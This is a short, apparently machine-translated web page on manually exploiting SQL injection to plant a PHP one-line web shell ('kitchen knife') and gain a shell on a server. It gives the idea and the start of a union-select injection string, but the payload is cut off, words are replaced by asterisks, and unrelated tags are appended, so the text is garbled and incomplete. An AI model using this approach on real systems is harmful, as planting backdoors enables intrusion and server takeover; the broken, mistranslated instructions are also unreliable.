Get the App
SLTechnology News&Howtos  ›  Database  › 

Manual exploitation of SQL inject vulnerabilities: get shell

Shulou Source: shulou.com Published: 2022-06-01 10:15:29 10月03日 Update

Idea: upload a "backdoor" and control the backdoor to get the shell, such as the sentence *. For example:

/ / submit via request and execute shell

/ / PHP one sentence *, serve the kitchen knife directly

The following statement is constructed here:

1'and 1, 2 union select "

Tags: In a word back door train of thought kitchen knife sentence control manual loophole process Apple Docker Huawei Linux macOS MariaDB Microsoft MySQL NVidia OPPO Reno NVidia macOS Shulou Information Redmi Shulou Technology